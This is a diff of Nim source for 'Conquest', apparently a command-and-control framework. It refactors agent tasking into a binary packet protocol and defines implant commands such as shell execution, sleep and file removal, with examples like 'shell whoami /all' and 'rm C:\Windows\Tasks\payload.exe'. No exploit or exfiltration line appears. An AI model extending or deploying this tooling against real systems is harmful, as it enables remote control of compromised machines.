proc error404*(ctx: Context) {.async.} = proc error404*(ctx: Context) {.async.} =
resp "", Http404 resp "", Http404
@@ -86,16 +86,13 @@ proc getTasks*(ctx: Context) {.async.} =
let let
listener = ctx.getPathParams("listener") listener = ctx.getPathParams("listener")
agent = ctx.getPathParams("agent") agent = ctx.getPathParams("agent")
let tasksJson = getTasks(listener, agent) try:
let tasks = getTasks(listener, agent)
# If agent/listener is invalid, return a 404 Not Found error code resp $tasks
if tasksJson == nil: except CatchableError:
resp "", Http404 resp "", Http404
# Return all currently active tasks as a JsonObject
resp jsonResponse(tasksJson)
#[ #[
POST /{listener-uuid}/{agent-uuid}/{task-uuid}/results POST /{listener-uuid}/{agent-uuid}/{task-uuid}/results

View File

@@ -1,9 +1,9 @@
import terminal, strformat, strutils, tables, times, system, osproc, streams import terminal, strformat, strutils, tables, times, system, osproc, streams
import ../utils import ../utils
import ../task/handler import ../task/dispatcher
import ../db/database import ../db/database
import ../../types import ../../common/types
# Utility functions # Utility functions
proc addMultiple*(cq: Conquest, agents: seq[Agent]) = proc addMultiple*(cq: Conquest, agents: seq[Agent]) =

View File

@@ -4,7 +4,7 @@ import prologue
import ../utils import ../utils
import ../api/routes import ../api/routes
import ../db/database import ../db/database
import ../../types import ../../common/types
# Utility functions # Utility functions
proc delListener(cq: Conquest, listenerName: string) = proc delListener(cq: Conquest, listenerName: string) =

View File

@@ -4,7 +4,7 @@ import strutils, strformat, times, system, tables
import ./[agent, listener] import ./[agent, listener]
import ../[globals, utils] import ../[globals, utils]
import ../db/database import ../db/database
import ../../types import ../../common/types
#[ #[
Argument parsing Argument parsing

View File

@@ -2,7 +2,7 @@ import system, terminal, tiny_sqlite
import ./[dbAgent, dbListener] import ./[dbAgent, dbListener]
import ../utils import ../utils
import ../../types import ../../common/types
# Export functions so that only ./db/database is required to be imported # Export functions so that only ./db/database is required to be imported
export dbAgent, dbListener export dbAgent, dbListener

View File

@@ -1,7 +1,7 @@
import system, terminal, tiny_sqlite, times import system, terminal, tiny_sqlite, times
import ../utils import ../utils
import ../../types import ../../common/types
#[ #[
Agent database functions Agent database functions

View File

@@ -1,7 +1,7 @@
import system, terminal, tiny_sqlite import system, terminal, tiny_sqlite
import ../utils import ../utils
import ../../types import ../../common/types
# Utility functions # Utility functions
proc stringToProtocol*(protocol: string): Protocol = proc stringToProtocol*(protocol: string): Protocol =

View File

@@ -1,4 +1,4 @@
import ../types import ../common/types
# Global variable for handling listeners, agents and console output # Global variable for handling listeners, agents and console output
var cq*: Conquest var cq*: Conquest

View File

@@ -1,5 +1,6 @@
import random import random
import core/server import core/server
import strutils
# Conquest framework entry point # Conquest framework entry point
when isMainModule: when isMainModule:

View File

@@ -1,16 +1,188 @@
import argparse, times, strformat, terminal, sequtils import times, strformat, terminal, tables, json, sequtils, strutils
import ../../types import ./[parser, packer]
import ../utils import ../utils
import ../../common/types
proc createTask*(cq: Conquest, command: CommandType, args: string, message: string) = proc initAgentCommands*(): Table[string, Command] =
let var commands = initTable[string, Command]()
date = now().format("dd-MM-yyyy HH:mm:ss")
task = Task( commands["shell"] = Command(
id: generateUUID(), name: "shell",
agent: cq.interactAgent.name, commandType: CMD_SHELL,
command: command, description: "Execute a shell command and retrieve the output.",
args: args, example: "shell whoami /all",
) arguments: @[
Argument(name: "command", description: "Command to be executed.", argumentType: STRING, isRequired: true),
Argument(name: "arguments", description: "Arguments to be passed to the command.", argumentType: STRING, isRequired: false)
]
)
commands["sleep"] = Command(
name: "sleep",
commandType: CMD_SLEEP,
description: "Update sleep delay configuration.",
example: "sleep 5",
arguments: @[
Argument(name: "delay", description: "Delay in seconds.", argumentType: INT, isRequired: true)
]
)
commands["pwd"] = Command(
name: "pwd",
commandType: CMD_PWD,
description: "Retrieve current working directory.",
example: "pwd",
arguments: @[]
)
commands["cd"] = Command(
name: "cd",
commandType: CMD_CD,
description: "Change current working directory.",
example: "cd C:\\Windows\\Tasks",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path of the directory to change to.", argumentType: STRING, isRequired: true)
]
)
commands["ls"] = Command(
name: "ls",
commandType: CMD_LS,
description: "List files and directories.",
example: "ls C:\\Users\\Administrator\\Desktop",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path. Default: current working directory.", argumentType: STRING, isRequired: false)
]
)
commands["rm"] = Command(
name: "rm",
commandType: CMD_RM,
description: "Remove a file.",
example: "rm C:\\Windows\\Tasks\\payload.exe",
arguments: @[
Argument(name: "file", description: "Relative or absolute path to the file to delete.", argumentType: STRING, isRequired: true)
]
)
commands["rmdir"] = Command(
name: "rmdir",
commandType: CMD_RMDIR,
description: "Remove a directory.",
example: "rm C:\\Payloads",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path to the directory to delete.", argumentType: STRING, isRequired: true)
]
)
commands["move"] = Command(
name: "move",
commandType: CMD_MOVE,
description: "Move a file or directory.",
example: "move source.exe C:\\Windows\\Tasks\\destination.exe",
arguments: @[
Argument(name: "source", description: "Source file path.", argumentType: STRING, isRequired: true),
Argument(name: "destination", description: "Destination file path.", argumentType: STRING, isRequired: true)
]
)
commands["copy"] = Command(
name: "copy",
commandType: CMD_COPY,
description: "Copy a file or directory.",
example: "copy source.exe C:\\Windows\\Tasks\\destination.exe",
arguments: @[
Argument(name: "source", description: "Source file path.", argumentType: STRING, isRequired: true),
Argument(name: "destination", description: "Destination file path.", argumentType: STRING, isRequired: true)
]
)
return commands
let commands = initAgentCommands()
proc getCommandFromTable(input: string, commands: Table[string, Command]): Command =
try:
let command = commands[input]
return command
except ValueError:
raise newException(ValueError, fmt"The command '{input}' does not exist.")
proc displayHelp(cq: Conquest, commands: Table[string, Command]) =
cq.writeLine("Available commands:")
cq.writeLine(" * back")
for key, cmd in commands:
cq.writeLine(fmt" * {cmd.name:<15}{cmd.description}")
cq.writeLine()
proc displayCommandHelp(cq: Conquest, command: Command) =
var usage = command.name & " " & command.arguments.mapIt(
if it.isRequired: fmt"<{it.name}>" else: fmt"[{it.name}]"
).join(" ")
if command.example != "":
usage &= "\nExample : " & command.example
cq.writeLine(fmt"""
{command.description}
Usage : {usage}
""")
if command.arguments.len > 0:
cq.writeLine("Arguments:\n")
let header = @["Name", "Type", "Required", "Description"]
cq.writeLine(fmt" {header[0]:<15} {header[1]:<6} {header[2]:<8} {header[3]}")
cq.writeLine(fmt" {'-'.repeat(15)} {'-'.repeat(6)} {'-'.repeat(8)} {'-'.repeat(20)}")
for arg in command.arguments:
let isRequired = if arg.isRequired: "YES" else: "NO"
cq.writeLine(fmt" * {arg.name:<15} {($arg.argumentType).toUpperAscii():<6} {isRequired:>8} {arg.description}")
cq.writeLine()
proc handleHelp(cq: Conquest, parsed: seq[string], commands: Table[string, Command]) =
try:
# Try parsing the first argument passed to 'help' as a command
cq.displayCommandHelp(getCommandFromTable(parsed[1], commands))
except IndexDefect:
# 'help' command is called without additional parameters
cq.displayHelp(commands)
except ValueError:
# Command was not found
cq.writeLine(fgRed, styleBright, fmt"[-] The command '{parsed[1]}' does not exist." & '\n')
proc handleAgentCommand*(cq: Conquest, input: string) =
# Return if no command (or just whitespace) is entered
if input.replace(" ", "").len == 0: return
let date: string = now().format("dd-MM-yyyy HH:mm:ss")
cq.writeLine(fgBlue, styleBright, fmt"[{date}] ", fgYellow, fmt"[{cq.interactAgent.name}] ", resetStyle, styleBright, input)
# Convert user input into sequence of string arguments
let parsedArgs = parseInput(input)
cq.interactAgent.tasks.add(task) # Handle 'back' command
cq.writeLine(fgBlack, styleBright, fmt"[{date}] [*] ", resetStyle, message) if parsedArgs[0] == "back":
return
# Handle 'help' command
if parsedArgs[0] == "help":
cq.handleHelp(parsedArgs, commands)
return
# Handle commands with actions on the agent
try:
let
command = getCommandFromTable(parsedArgs[0], commands)
task = cq.parseTask(command, parsedArgs[1..^1])
taskData: seq[byte] = cq.serializeTask(task)
# Add task to queue
cq.interactAgent.tasks.add(taskData)
cq.writeLine(fgBlack, styleBright, fmt"[{date}] [*] ", resetStyle, fmt"Tasked agent to {command.description.toLowerAscii()}")
except CatchableError:
cq.writeLine(fgRed, styleBright, fmt"[-] {getCurrentExceptionMsg()}" & "\n")
return

View File

@@ -1,185 +0,0 @@
import times, strformat, terminal, tables, json, sequtils, strutils
import ./[parser, packer, dispatcher]
import ../utils
import ../../types
proc initAgentCommands*(): Table[CommandType, Command] =
var commands = initTable[CommandType, Command]()
commands[ExecuteShell] = Command(
name: "shell",
commandType: ExecuteShell,
description: "Execute a shell command and retrieve the output.",
example: "shell whoami /all",
arguments: @[
Argument(name: "command", description: "Command to be executed.", argumentType: String, isRequired: true),
Argument(name: "arguments", description: "Arguments to be passed to the command.", argumentType: String, isRequired: false)
]
)
commands[Sleep] = Command(
name: "sleep",
commandType: Sleep,
description: "Update sleep delay configuration.",
example: "sleep 5",
arguments: @[
Argument(name: "delay", description: "Delay in seconds.", argumentType: Int, isRequired: true)
]
)
commands[GetWorkingDirectory] = Command(
name: "pwd",
commandType: GetWorkingDirectory,
description: "Retrieve current working directory.",
example: "pwd",
arguments: @[]
)
commands[SetWorkingDirectory] = Command(
name: "cd",
commandType: SetWorkingDirectory,
description: "Change current working directory.",
example: "cd C:\\Windows\\Tasks",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path of the directory to change to.", argumentType: String, isRequired: true)
]
)
commands[ListDirectory] = Command(
name: "ls",
commandType: ListDirectory,
description: "List files and directories.",
example: "ls C:\\Users\\Administrator\\Desktop",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path. Default: current working directory.", argumentType: String, isRequired: false)
]
)
commands[RemoveFile] = Command(
name: "rm",
commandType: RemoveFile,
description: "Remove a file.",
example: "rm C:\\Windows\\Tasks\\payload.exe",
arguments: @[
Argument(name: "file", description: "Relative or absolute path to the file to delete.", argumentType: String, isRequired: true)
]
)
commands[RemoveDirectory] = Command(
name: "rmdir",
commandType: RemoveDirectory,
description: "Remove a directory.",
example: "rm C:\\Payloads",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path to the directory to delete.", argumentType: String, isRequired: true)
]
)
commands[Move] = Command(
name: "move",
commandType: Move,
description: "Move a file or directory.",
example: "move source.exe C:\\Windows\\Tasks\\destination.exe",
arguments: @[
Argument(name: "source", description: "Source file path.", argumentType: String, isRequired: true),
Argument(name: "destination", description: "Destination file path.", argumentType: String, isRequired: true)
]
)
commands[Copy] = Command(
name: "copy",
commandType: Copy,
description: "Copy a file or directory.",
example: "copy source.exe C:\\Windows\\Tasks\\destination.exe",
arguments: @[
Argument(name: "source", description: "Source file path.", argumentType: String, isRequired: true),
Argument(name: "destination", description: "Destination file path.", argumentType: String, isRequired: true)
]
)
return commands
let commands = initAgentCommands()
proc getCommandFromTable(cmd: string, commands: Table[CommandType, Command]): (CommandType, Command) =
try:
let commandType = parseEnum[CommandType](cmd.toLowerAscii())
let command = commands[commandType]
return (commandType, command)
except ValueError:
raise newException(ValueError, fmt"The command '{cmd}' does not exist.")
proc displayHelp(cq: Conquest, commands: Table[CommandType, Command]) =
cq.writeLine("Available commands:")
cq.writeLine(" * back")
for key, cmd in commands:
cq.writeLine(fmt" * {cmd.name:<15}{cmd.description}")
cq.writeLine()
proc displayCommandHelp(cq: Conquest, command: Command) =
var usage = command.name & " " & command.arguments.mapIt(
if it.isRequired: fmt"<{it.name}>" else: fmt"[{it.name}]"
).join(" ")
if command.example != "":
usage &= "\nExample : " & command.example
cq.writeLine(fmt"""
{command.description}
Usage : {usage}
""")
if command.arguments.len > 0:
cq.writeLine("Arguments:\n")
let header = @["Name", "Type", "", "Description"]
cq.writeLine(fmt" {header[0]:<15} {header[1]:<8}{header[2]:<10} {header[3]}")
cq.writeLine(fmt" {'-'.repeat(15)} {'-'.repeat(18)} {'-'.repeat(20)}")
for arg in command.arguments:
let requirement = if arg.isRequired: "(REQUIRED)" else: "(OPTIONAL)"
cq.writeLine(fmt" * {arg.name:<15} {($arg.argumentType).toUpperAscii():<8}{requirement:<10} {arg.description}")
cq.writeLine()
proc handleHelp(cq: Conquest, parsed: seq[string], commands: Table[CommandType, Command]) =
try:
# Try parsing the first argument passed to 'help' as a command
let (commandType, command) = getCommandFromTable(parsed[1], commands)
cq.displayCommandHelp(command)
except IndexDefect:
# 'help' command is called without additional parameters
cq.displayHelp(commands)
except ValueError:
# Command was not found
cq.writeLine(fgRed, styleBright, fmt"[-] The command '{parsed[1]}' does not exist." & '\n')
proc handleAgentCommand*(cq: Conquest, input: string) =
# Return if no command (or just whitespace) is entered
if input.replace(" ", "").len == 0: return
let date: string = now().format("dd-MM-yyyy HH:mm:ss")
cq.writeLine(fgBlue, styleBright, fmt"[{date}] ", fgYellow, fmt"[{cq.interactAgent.name}] ", resetStyle, styleBright, input)
let parsedArgs = parseAgentCommand(input)
# Handle 'back' command
if parsedArgs[0] == "back":
return
# Handle 'help' command
if parsedArgs[0] == "help":
cq.handleHelp(parsedArgs, commands)
return
# Handle commands with actions on the agent
try:
let
(commandType, command) = getCommandFromTable(parsedArgs[0], commands)
payload = cq.packageArguments(command, parsedArgs)
cq.createTask(commandType, $payload, fmt"Tasked agent to {command.description.toLowerAscii()}")
except CatchableError:
cq.writeLine(fgRed, styleBright, fmt"[-] {getCurrentExceptionMsg()}" & "\n")
return

View File

@@ -1,34 +1,40 @@
import strutils, json import strutils, strformat, streams
import ../../types import ../utils
import ../../common/types
import ../../common/serialize
proc packageArguments*(cq: Conquest, command: Command, arguments: seq[string]): JsonNode = proc serializeTask*(cq: Conquest, task: Task): seq[byte] =
# Construct a JSON payload with argument names and values var packer = initTaskPacker()
result = newJObject()
let parsedArgs = if arguments.len > 1: arguments[1..^1] else: @[] # Remove first element from sequence to only handle arguments
for i, argument in command.arguments: # Serialize payload
packer
# Argument provided - convert to the corresponding data type .addToPayload(task.taskId)
if i < parsedArgs.len: .addToPayload(task.agentId)
case argument.argumentType: .addToPayload(task.listenerId)
of Int: .addToPayload(task.timestamp)
result[argument.name] = %parseUInt(parsedArgs[i]) .addToPayload(task.command)
of Binary: .addToPayload(task.argCount)
# Read file into memory and convert it into a base64 string
result[argument.name] = %"" for arg in task.args:
else: packer.addArgument(arg)
# The last optional argument is joined together
# This is required for non-quoted input with infinite length, such as `shell mv arg1 arg2` let payload = packer.packPayload()
if i == command.arguments.len - 1 and not argument.isRequired:
result[argument.name] = %parsedArgs[i..^1].join(" ") # TODO: Encrypt payload body
else:
result[argument.name] = %parsedArgs[i] # Serialize header
packer
# Argument not provided - set to empty string for optional args .addToHeader(task.header.magic)
else: .addToHeader(task.header.version)
# If a required argument is not provided, display the help text .addToHeader(task.header.packetType)
if argument.isRequired: .addToHeader(task.header.flags)
raise newException(ValueError, "Missing required arguments.") .addToHeader(task.header.seqNr)
else: .addToHeader(cast[uint32](payload.len))
result[argument.name] = %"" .addDataToHeader(task.header.hmac)
let header = packer.packHeader()
# TODO: Calculate and patch HMAC
return header & payload

View File

@@ -1,6 +1,8 @@
import ../../types import strutils, strformat, times
import ../utils
import ../../common/types
proc parseAgentCommand*(input: string): seq[string] = proc parseInput*(input: string): seq[string] =
var i = 0 var i = 0
while i < input.len: while i < input.len:
@@ -30,3 +32,83 @@ proc parseAgentCommand*(input: string): seq[string] =
# Add argument to returned result # Add argument to returned result
if arg.len > 0: result.add(arg) if arg.len > 0: result.add(arg)
proc parseArgument*(argument: Argument, value: string): TaskArg =
var result: TaskArg
result.argType = cast[uint8](argument.argumentType)
case argument.argumentType:
of INT:
# Length: 4 bytes
let intValue = cast[uint32](parseUInt(value))
result.data = @[byte(intValue and 0xFF), byte((intValue shr 8) and 0xFF), byte((intValue shr 16) and 0xFF), byte((intValue shr 24) and 0xFF)]
of LONG:
# Length: 8 bytes
var data = newSeq[byte](8)
let intValue = cast[uint64](parseUInt(value))
for i in 0..7:
data[i] = byte((intValue shr (i * 8)) and 0xFF)
result.data = data
of BOOL:
# Length: 1 byte
if value == "true":
result.data = @[1'u8]
elif value == "false":
result.data = @[0'u8]
else:
raise newException(ValueError, "Invalid value for boolean argument.")
of STRING:
result.data = cast[seq[byte]](value)
of BINARY:
# Read file as binary stream
discard
return result
proc parseTask*(cq: Conquest, command: Command, arguments: seq[string]): Task =
# Construct the task payload prefix
var task: Task
task.taskId = uuidToUint32(generateUUID())
task.agentId = uuidToUint32(cq.interactAgent.name)
task.listenerId = uuidToUint32(cq.interactAgent.listener)
task.timestamp = uint32(now().toTime().toUnix())
task.command = cast[uint16](command.commandType)
task.argCount = uint8(arguments.len)
var taskArgs: seq[TaskArg]
# Add the task arguments
for i, arg in command.arguments:
if i < arguments.len:
taskArgs.add(parseArgument(arg, arguments[i]))
else:
if arg.isRequired:
raise newException(ValueError, "Missing required argument.")
else:
# Handle optional argument
taskArgs.add(parseArgument(arg, ""))
task.args = taskArgs
# Construct the header
var taskHeader: Header
taskHeader.magic = MAGIC
taskHeader.version = VERSION
taskHeader.packetType = cast[uint8](MSG_TASK)
taskHeader.flags = cast[uint16](FLAG_PLAINTEXT)
taskHeader.seqNr = 1'u32 # TODO: Implement sequence tracking
taskHeader.size = 0'u32
taskHeader.hmac = default(array[16, byte])
task.header = taskHeader
# Return the task object for serialization
return task

View File

@@ -1,7 +1,7 @@
import strutils, terminal, tables, sequtils, times, strformat, random, prompt import strutils, terminal, tables, sequtils, times, strformat, random, prompt
import std/wordwrap import std/wordwrap
import ../types import ../common/types
# Utility functions # Utility functions
proc parseOctets*(ip: string): tuple[first, second, third, fourth: int] = proc parseOctets*(ip: string): tuple[first, second, third, fourth: int] =
@@ -20,6 +20,21 @@ proc generateUUID*(): string =
# Create a 4-byte HEX UUID string (8 characters) # Create a 4-byte HEX UUID string (8 characters)
(0..<4).mapIt(rand(255)).mapIt(fmt"{it:02X}").join() (0..<4).mapIt(rand(255)).mapIt(fmt"{it:02X}").join()
proc uuidToUint32*(uuid: string): uint32 =
return fromHex[uint32](uuid)
proc uuidToString*(uuid: uint32): string =
return uuid.toHex(8)
proc toHexDump*(data: seq[byte]): string =
for i, b in data:
result.add(b.toHex(2))
if i < data.len - 1:
if (i + 1) mod 4 == 0:
result.add(" | ") # Add | every 4 bytes
else:
result.add(" ") # Regular space
# Function templates and overwrites # Function templates and overwrites
template writeLine*(cq: Conquest, args: varargs[untyped]) = template writeLine*(cq: Conquest, args: varargs[untyped]) =
cq.prompt.writeLine(args) cq.prompt.writeLine(args)

View File

@@ -1,110 +0,0 @@
import prompt
import tables
import times
# Task structure
type
CommandType* = enum
ExecuteShell = "shell"
ExecuteBof = "bof"
ExecuteAssembly = "dotnet"
ExecutePe = "pe"
Sleep = "sleep"
GetWorkingDirectory = "pwd"
SetWorkingDirectory = "cd"
ListDirectory = "ls"
RemoveFile = "rm"
RemoveDirectory = "rmdir"
Move = "move"
Copy = "copy"
ArgumentType* = enum
String = "string"
Int = "int"
Long = "long"
Bool = "bool"
Binary = "binary"
Argument* = object
name*: string
description*: string
argumentType*: ArgumentType
isRequired*: bool
Command* = object
name*: string
commandType*: CommandType
description*: string
example*: string
arguments*: seq[Argument]
dispatchMessage*: string
TaskStatus* = enum
Completed = "completed"
Created = "created"
Pending = "pending"
Failed = "failed"
Cancelled = "cancelled"
TaskResult* = ref object
task*: string
agent*: string
data*: string
status*: TaskStatus
Task* = ref object
id*: string
agent*: string
command*: CommandType
args*: string # Json string containing all the positional arguments
# Example: """{"command": "whoami", "arguments": "/all"}"""
# Agent structure
type
AgentRegistrationData* = object
username*: string
hostname*: string
domain*: string
ip*: string
os*: string
process*: string
pid*: int
elevated*: bool
sleep*: int
Agent* = ref object
name*: string
listener*: string
username*: string
hostname*: string
domain*: string
process*: string
pid*: int
ip*: string
os*: string
elevated*: bool
sleep*: int
jitter*: float
tasks*: seq[Task]
firstCheckin*: DateTime
latestCheckin*: DateTime
# Listener structure
type
Protocol* = enum
HTTP = "http"
Listener* = ref object
name*: string
address*: string
port*: int
protocol*: Protocol
# Server structure
type
Conquest* = ref object
prompt*: Prompt
dbPath*: string
listeners*: Table[string, Listener]
agents*: Table[string, Agent]
interactAgent*: Agent